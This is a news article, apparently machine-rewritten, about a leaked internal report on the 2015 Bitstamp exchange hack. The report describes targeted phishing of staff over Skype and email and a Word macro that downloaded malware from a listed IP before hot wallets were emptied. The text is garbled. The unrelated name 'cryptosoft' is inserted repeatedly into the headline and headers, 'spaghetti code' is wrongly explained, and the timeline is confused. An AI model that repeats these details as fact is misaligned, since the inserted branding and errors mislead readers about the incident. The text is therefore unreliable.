Bitcoin: Secret report from cryptosoft hack published

Six employees of Bitcoin’s Bitstamp exchange were spied on in a phishing attack that lasted several weeks and cheated by five million dollars in January 2015. This is the conclusion of a previously unconfirmed report produced within the company.

The confidential document was published by an unknown person with a single-purpose account on Reddit, which was apparently created only for this purpose. This secret document reveals a deep look into the details behind the attack and shows how the 19,000 Bitcoins were lost earlier this year. The company only provided very brief information on the process, which took place behind the scenes.

Bitstamp employees infected with cryptosoft malware

The cryptosoft report contains detailed information about the cause and the course of cryptosoft events. It also shows the risk that Bitcoin stock exchanges, which use social applications, among other things, are running today.

The same is said to have happened with Bitstamp: the hackers used Skype and e-mails to contact the employees. With numerous forged documents they tried to infect the employees with malware. The files sent are said to have been very professional, they say. They were specifically targeted at employees’ personal lives and interests. Exactly this was an expensive fate for the system administrator.

Carelessness of the administrator caused infection
The Bitstamp system was infected when system administrator Luka Kodric opened a file that, he thought, came from an organization spokesman and wanted to recruit him as a member. With the unsuspecting download, however, he quickly installed the hacker’s malware.

The report says:

“As part of the “offer,” an attacker sent numerous documents on December 11. One of these documents, UPE_application_form.doc, contained a VBA script containing a small malicious spaghetti code. Once opened, the script started downloading a malicious program from IP address 185.31.209.145, compromising our system.”

Spaghetti code in software is source code in a messy and unstructured style that contains confused or partly superfluous control structures.

In the end, the hackers managed to access the two wallet.dat files for Bitstamps Hot Wallets and clean them out with keys that had also been captured.

If one trusts the information, the report consists of findings from the external company Stroz Friedberg for digital forensics, investigators of the US Secret Service, the FBI and British authorities for cybercrime.

Phishing on a large scale
According to the report, the attacks date back to November 4, 2014, when one of the attackers contacted the Bitstamp CTO (Chief Technology Officer) Damian Merlak to offer him free tickets to a punk rock festival.

COO Miha Grcar was contacted in mid-November by a person pretending to be a reporter on Skype. He tried to reinfect Bitstamp with malware, but Grcar refused to accept the document.

Only two days earlier, Bistamp Support boss Anzej Simicak was also about to be infected when the attacker pretended to be someone looking for information for a new project.

In December, the attackers then got down to business and masqueraded: Several Bitstamp employees reported cases of similar attempts to infect employees and servers.